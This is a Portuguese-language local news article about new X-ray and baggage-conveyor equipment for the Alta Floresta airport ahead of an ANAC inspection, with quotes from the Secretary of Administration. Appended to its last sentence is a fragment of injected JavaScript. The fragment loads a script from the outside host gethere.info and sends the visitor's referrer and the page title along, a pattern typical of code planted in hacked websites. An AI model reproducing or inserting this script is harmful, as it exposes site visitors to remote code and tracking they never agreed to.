Capa / Em Destaque / Esteira e raio-x do aeroporto serão instalados este mês, garante Secretário

Esteira e raio-x do aeroporto serão instalados este mês, garante Secretário

esteira-de-bagagem-dicasDionéia Martins

No próximo mês a aeroporto Piloto Oswaldo Marques Dias de Alta Floresta receberá a equipe de inspeção da Agência Nacional de Aviação Civil (ANAC), para mais uma vistoria de rotina. Ao contrário das vistorias anteriores, em que a agencia notificava o município por falta de alguns equipamentos, nesta isso não acontecerá é o que garante o secretário de Administração Claudinei de Souza Jesus.

O Secretário afirmou que o raio-x já foi adquirida e que até a próxima semana já deve está no município, a outra pendencia era a esteira de bagagem que também já foi realizado o processo licitatório e nos próximos 20 dias a empresa ganhadora estará instalando o equipamento. O aparelho de raio-x, a aquisição foi mais rápida porque o município aderiu a um contrato do município de Sorriso.

“O raio-x a gente pegou uma carona na ata de registro de preço da Prefeitura de Sorriso e hoje (ontem) está saindo da fabrica até o final de semana que vem ele está em Alta Floresta, a esteira de bagagem a licitação foi hoje (ontem) e uma empresa de Sinop ganhou”, afirmou Claudinei.

Segundo o Secretário a empresa que ganhou a licitação é a mesma que instalou o equipamento do aeroporto de Sinop e já realizou a medição para a fabricação da esteira de bagagem e no prazo de 20 dias já estará fazendo a instalação. “É uma coisa que já é uma realidade, que já tá se concretizando em Alta Floresta”, comemorou Claudinei.

O próximo passo será a contratação de servidores para o aeroporto e o treinamento para que possam operar os novos equipamentos adquiridos por meio de convênio com o Governo do Estado e a contribuição dos deputados Estadual Ninhino e Federal Nilson Leitão. “Vamos entrar em contato com a Anac para liberar uma banca e capacitar os servidores aqui em Alta Floresta, então primeiro passo foi feito que é adquirir o equipamento agora é pedir a homologação e colocar o nosso pessoal pra operar”, ressaltou.

Com todos os problemas sanados o município agora vai iniciar a conversação com outras empresas áreas. “Agora que o aeroporto está equipado vamos atrás de mais empresas para operar no município, é procurar mais concorrência”, afirmou.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top